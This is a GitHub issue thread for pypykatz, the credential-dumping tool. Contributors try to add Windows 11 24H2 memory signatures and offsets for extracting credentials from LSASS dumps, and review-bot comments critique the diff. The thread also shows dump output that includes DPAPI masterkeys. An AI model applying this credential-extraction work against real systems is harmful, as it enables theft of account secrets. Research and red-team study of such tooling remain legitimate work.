Win11 24H2 Signature Missing #174
Seems like a pretty complex task for someone like me who doesn't fully understand how this tool works. At a high level, I think the 24H2 build number needs to be included for these template checks. I tinkered with it some, but now I am getting a Kerberos exception. The signature and offset for the Kerberos template should be fine, so I'm guessing it's a problem with the structs. The diff below shows the changes I made to find what I think is the right signature and offset for the msv and wdigest templates.
git diff
diff --git a/pypykatz/commons/common.py b/pypykatz/commons/common.py
index 986c0ff..e726b27 100644
--- a/pypykatz/commons/common.py
+++ b/pypykatz/commons/common.py
@@ -362,6 +362,7 @@ class WindowsBuild(enum.Enum):
WIN_10_20H2 = 19042
WIN_11_2022 = 20348
WIN_11_2023 = 22621
+ WIN_11_2024 = 26100
class WindowsMinBuild(enum.Enum):
WIN_XP = 2500
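Review bot: `WIN_11_2024 = 26100` follows the year-based naming of `WIN_11_2022` / `WIN_11_2023`, but the same build number is added to `WindowsMinBuild` in the next hunk under a different name (`WIN_11_24H2`), so the two enums now describe one build two ways. Pick one scheme for both, or add a short comment on each member stating that 26100 is the Windows 11 24H2 release build, so they stay in sync when the next build is added.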
@@ -372,6 +373,7 @@ class WindowsMinBuild(enum.Enum):
WIN_BLUE = 9400
WIN_10 = 9800
WIN_11 = 22000
+ WIN_11_24H2 = 26100
def hexdump( src, length=16, sep='.', start = 0):
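Review bot: the existing `WindowsMinBuild` members are floor values that mark the start of a build family (`WIN_BLUE = 9400`, `WIN_10 = 9800`, `WIN_11 = 22000`), and the `>=` / `<` checks in the template files rely on that; `WIN_11_24H2 = 26100` is the exact 24H2 release build, so any 24H2 pre-release build numbered just below 26100 would still select the older 22000 template. Either choose a floor in the style of the other members or add a comment saying that only the release build is intended, and note that `WindowsBuild.WIN_11_2024` carries the same value.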
diff --git a/pypykatz/lsadecryptor/packages/kerberos/templates.py b/pypykatz/lsadecryptor/packages/kerberos/templates.py
index 320b8aa..4485d90 100644
--- a/pypykatz/lsadecryptor/packages/kerberos/templates.py
+++ b/pypykatz/lsadecryptor/packages/kerberos/templates.py
@@ -101,7 +101,16 @@ class KerberosTemplate(PackageTemplate):
template.hash_password_struct = KERB_HASHPASSWORD_6_1607
template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
- elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2022.value:
+ elif WindowsBuild.WIN_11_2022.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
+ template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
+ template.first_entry_offset = 6
+ template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
+ template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_11
+ template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
+ template.hash_password_struct = KERB_HASHPASSWORD_6_1607
+ template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
+
+ elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2024.value:
template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
template.first_entry_offset = 6
template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
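Review bot: the new `>= WIN_11_2024` branch sets the same `signature` (`b'\x48\x8b\x18\x48\x8d\x0d'`), `first_entry_offset = 6` and `KIWI_KERBEROS_LOGON_SESSION_10_1607` as the bounded `WIN_11_2022 .. WIN_11_2024` branch directly above it, so on the lines visible here the split changes nothing for 24H2, and the `kerberos_exception_please_report` seen in the test output is expected to persist. Either give the 24H2 branch the struct definitions that actually differ (the comment suspects the structs rather than the signature), or collapse the two branches back into a single `>= WIN_11_2022` branch until real differences are known. The added empty `+` line between the branches is unnecessary and can be dropped.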
diff --git a/pypykatz/lsadecryptor/packages/msv/templates.py b/pypykatz/lsadecryptor/packages/msv/templates.py
index 20600df..e3cb6ba 100644
--- a/pypykatz/lsadecryptor/packages/msv/templates.py
+++ b/pypykatz/lsadecryptor/packages/msv/templates.py
@@ -137,10 +137,15 @@ class MsvTemplate(PackageTemplate):
template.first_entry_offset = 24
template.offset2 = -4
- else:
+ elif WindowsBuild.WIN_11_2023.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
template.signature = b'\x45\x89\x37\x4c\x8b\xf7\x8b\xf3\x45\x85\xc0\x0f'
template.first_entry_offset = 27
template.offset2 = -4
+
+ else:
+ template.signature = b'\x4c\x8b\xfe\x48\x85\xf6\x0f'
+ template.first_entry_offset = 52
+ template.offset2 = -4
elif sysinfo.architecture == KatzSystemArchitecture.X86:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
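Review bot: the previous catch-all `else` is narrowed to `WIN_11_2023 <= buildnumber < WIN_11_2024`, but the new 24H2 template is again placed in an unbounded `else`, so every future build silently gets the 24H2 signature and `first_entry_offset = 52` instead of failing loudly; make it an explicit `elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2024.value:` to match the kerberos and wdigest hunks in this diff. The change from `first_entry_offset = 27` to `52` also carries no comment, and the thread itself is unsure whether the right value is 23; a one-line note on how 52 was derived would let the next person validate it rather than re-derive it.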
diff --git a/pypykatz/lsadecryptor/packages/wdigest/templates.py b/pypykatz/lsadecryptor/packages/wdigest/templates.py
index 150f5f1..f53cb3b 100644
--- a/pypykatz/lsadecryptor/packages/wdigest/templates.py
+++ b/pypykatz/lsadecryptor/packages/wdigest/templates.py
@@ -41,11 +41,17 @@ class WdigestTemplate(PackageTemplate):
template.primary_offset = 48
template.list_entry = PWdigestListEntry
- elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11.value:
+ elif WindowsMinBuild.WIN_11.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_11_24H2.value:
template.signature = b'\x48\x3b\xd8\x74'
template.first_entry_offset = -4
template.primary_offset = 48
template.list_entry = PWdigestListEntry
+
+ elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11_24H2.value:
+ template.signature = b'\x48\x3b\xd9\x0f'
+ template.first_entry_offset = -4
+ template.primary_offset = 48
+ template.list_entry = PWdigestListEntry
else:
raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber)) |
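Review bot: the 24H2 branch changes only the `signature` (`b'\x48\x3b\xd9\x0f'` in place of `b'\x48\x3b\xd8\x74'`) and copies `first_entry_offset = -4` and `primary_offset = 48` from the previous branch unchanged. `first_entry_offset` is relative to wherever the new pattern matches in the 24H2 lsasrv.dll, so reusing the old value needs a justification in a comment, and the same holds for `primary_offset`. The test output shows every WDIGEST entry with `password None`, which is consistent with either a wrong offset or with no WDigest credential being cached, so the value should be confirmed against a dump where one is known to be present before merging. The empty `+` line before the new branch can be dropped.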
You are right, I didn't include the build number. To test it I put my code in the else condition (no build number match, execute with my signature). This is the guide I followed to get the signature values: https://www.praetorian.com/blog/inside-mimikatz-part2/
Thanks for the article. Still not 100% sure on calculating the offset. 23 maybe? I'm also getting a PEB parsing error. Here is my current output with the changes I made.
pypykatz lsa minidump ../lsass_win11.dmp
INFO:pypykatz:Parsing file ../lsass_win11.dmp
ERROR:root:PEB parsing error!
Traceback (most recent call last):
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 86, in _parse
self.__parse_peb()
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 235, in __parse_peb
self.peb = PEB.from_minidump(self)
^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/structures/peb.py", line 85, in from_minidump
buff_reader.move(minidumpfile.threads.threads[0].Teb + PEB_OFFSETS[offset_index]["peb"])
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 136, in move
self._select_segment(address)
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 104, in _select_segment
raise Exception('Memory address 0x%08x is not in process memory space' % requested_position)
Exception: Memory address 0x00000060 is not in process memory space
FILE: ======== ../lsass_win11.dmp =======
== Orphaned credentials ==
== WDIGEST [887d6]==
username Administrator
domainname JUICY
password None
password (hex)
== WDIGEST [14332]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [142e5]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e4]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d8a3]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d908]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e7]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== DPAPI [887d6]==
luid 559062
key_guid 9536a4de-f4ab-454a-8605-45c30ea579ea
masterkey 8e8a281bbd7d1f6063b8f2b6cc1e0fe4b427162acaad48565c757159419078e63afec2bc47b9ab536600aa7f852f23ac02fd39c8a864b58294891dacc9b7042a
sha1_masterkey f9d9a897d4501d268008cd519f8db403be976a6e
== DPAPI [3e7]==
luid 999
key_guid 896fd8e5-88d1-4328-bc25-8b7c2b58ae3b
masterkey 0fc77e1e7956dc9a54a5eeffdde3cee1574734d8150abaf58b1a82a2a90ce0e2604f27a2499a77a75f29e26fcf8586ccbe915ad74ba19063fc8285c312d35aa1
sha1_masterkey 7a1edd5c4501ef9ae7278c7654b4bcff337d859b
== DPAPI [3e7]==
luid 999
key_guid 67c2715a-9448-4e8f-a378-692bd18b7ee1
masterkey b66f15ed9b4b62c38cc9a407fce7034643b376ab60a9a4eccfb33d09094c07e02efc139517d59e4e7d9991135f0509b5721ae9308d4a9e9905567a507e930863
sha1_masterkey 55d12300aa2028b8db413f9881332e73b12210e7
== DPAPI [3e7]==
luid 999
key_guid 98c6d1f2-8891-4b1c-be2c-36a968a3b4ea
masterkey a8ed2aae4bd435a265f86a6de3bbd75df90ddcd616710b3a6039f6203c67c00e74dcfb0bd3169b0305b17ca3bab0aebf8a64e9cb350b60cb8506c4a0be72d04d
sha1_masterkey 701d9b5ef41de502fb6baac0d064ab92c2db7595
== Errors ==
kerberos_exception_please_report
Pypykatz doesn't contain the signatures for Win11 24H2 yet. I tried to implement it but I haven't managed yet. If anybody is better at reverse engineering, this is my progress so far:
This might be completely wrong though.
I attached lsasrv.dll from Win11 24H2.
lsasrv.zip